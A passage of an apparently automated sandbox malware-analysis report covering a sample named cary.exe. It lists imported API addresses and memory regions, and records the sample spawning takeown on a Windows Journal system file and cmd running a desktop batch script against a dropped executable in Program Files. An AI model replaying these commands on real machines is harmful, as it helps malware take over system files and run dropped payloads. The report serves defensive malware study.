| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:48:20 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #181: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #181 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:06, Reason: Child Process |
| Unmonitor | End Time: 00:03:12, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa4c |
| Parent PID | 0xc70 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
81C
0x
D18
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000080000 | 0x00080000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000080000 | 0x00080000 | 0x0008ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x00093fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x000a1fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x000a0000 | 0x000a4fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000b0000 | 0x000b0000 | 0x000c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0010ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00153fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00171fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x001bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| takeown.exe | 0x00210000 | 0x0021ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x0421ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004220000 | 0x04220000 | 0x0442ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04220000 | 0x042ddfff | Memory Mapped File | r |
|
|
|
- |
| imm32.dll | 0x042e0000 | 0x04309fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000042e0000 | 0x042e0000 | 0x042e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000042f0000 | 0x042f0000 | 0x042f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004330000 | 0x04330000 | 0x0442ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004430000 | 0x04430000 | 0x044effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000044f0000 | 0x044f0000 | 0x04677fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004680000 | 0x04680000 | 0x04800fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004810000 | 0x04810000 | 0x05c0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x05c10000 | 0x05f46fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x748a0000 | 0x748c7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f0d0000 | 0x7f0d0000 | 0x7f1cffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f1d0000 | 0x7f1d0000 | 0x7f1f2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f1f7000 | 0x7f1f7000 | 0x7f1f9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f1fa000 | 0x7f1fa000 | 0x7f1fafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f1fb000 | 0x7f1fb000 | 0x7f1fdfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f1fe000 | 0x7f1fe000 | 0x7f1fefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #182: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #182 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Portable Devices\publisherfunnydownloaded.exe"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:07, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:34 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x380 |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
7BC
0x
494
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000a90000 | 0x00a90000 | 0x04a8ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004a90000 | 0x04a90000 | 0x04aaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a90000 | 0x04a90000 | 0x04a9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004aa0000 | 0x04aa0000 | 0x04aa3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ab0000 | 0x04ab0000 | 0x04ab1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ab0000 | 0x04ab0000 | 0x04ab3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ac0000 | 0x04ac0000 | 0x04ad3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004ae0000 | 0x04ae0000 | 0x04b1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b20000 | 0x04b20000 | 0x04c1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004c20000 | 0x04c20000 | 0x04c23fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004c30000 | 0x04c30000 | 0x04c30fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004c40000 | 0x04c40000 | 0x04c41fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04c50000 | 0x04d0dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004d10000 | 0x04d10000 | 0x04d4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d50000 | 0x04d50000 | 0x04d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d80000 | 0x04d80000 | 0x04d8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d90000 | 0x04d90000 | 0x04f4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d90000 | 0x04d90000 | 0x04e4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e50000 | 0x04e50000 | 0x04f4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f50000 | 0x04f50000 | 0x0504ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05050000 | 0x05386fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x748d0000 | 0x748d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f4d0000 | 0x7f4d0000 | 0x7f5cffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f5d0000 | 0x7f5d0000 | 0x7f5f2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f5f5000 | 0x7f5f5000 | 0x7f5f7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f5f8000 | 0x7f5f8000 | 0x7f5f8fff | Private Memory | rw |
|
|
|
- |
